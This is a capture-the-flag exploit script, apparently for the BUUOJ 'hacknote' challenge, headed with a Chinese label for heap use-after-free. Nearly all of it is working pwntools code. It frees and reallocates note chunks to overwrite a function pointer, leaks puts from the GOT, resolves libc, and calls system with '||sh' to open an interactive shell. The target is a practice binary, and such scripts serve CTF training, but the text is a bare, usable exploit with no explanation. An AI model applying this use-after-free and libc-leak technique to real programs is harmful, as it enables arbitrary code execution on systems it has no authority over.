堆(UAF)
exp
from pwn import *
from LibcSearcher import *
p=process("./hacknote")
context.log_level="debug"
#p=remote("node4.buuoj.cn",27009)
elf=ELF("./hacknote")
puts_got=elf.got['puts']
def add(size,content):
p.recvuntil("Your choice :")
p.sendline('1')
p.recvuntil('Note size :')
p.sendline(str(size))
p.recvuntil("Content :")
p.send(content)
def delete(index):
p.recvuntil('Your choice :')
p.sendline('2')
p.recvuntil('Index :')
p.sendline(str(index))
def show(index):
p.recvuntil('Your choice :')
p.sendline('3')
p.recvuntil('Index :')
p.sendline(str(index))
add(0x18,'aaaa')
add(0x18,'bbbb')
delete(0)
delete(1)
log.info('puts_got:'+hex(puts_got))
puts=0x804862b
payload=p32(puts)+p32(puts_got)
add(8,payload)
show(0)
puts_addr=u32(p.recv(4))
log.info("puts_addr:"+hex(puts_addr))
libc=LibcSearcher("puts",puts_addr) # this is a libcsearch object
libcbase=puts_addr-libc.dump("puts") # address
binsh_addr=libcbase+libc.dump("str_bin_sh") # address
system_addr=libcbase+libc.dump("system") # address
delete(2)
payload=p32(system_addr)+'||sh'
add(8,payload)
#gdb.attach(p)
show(0)
p.interactive()
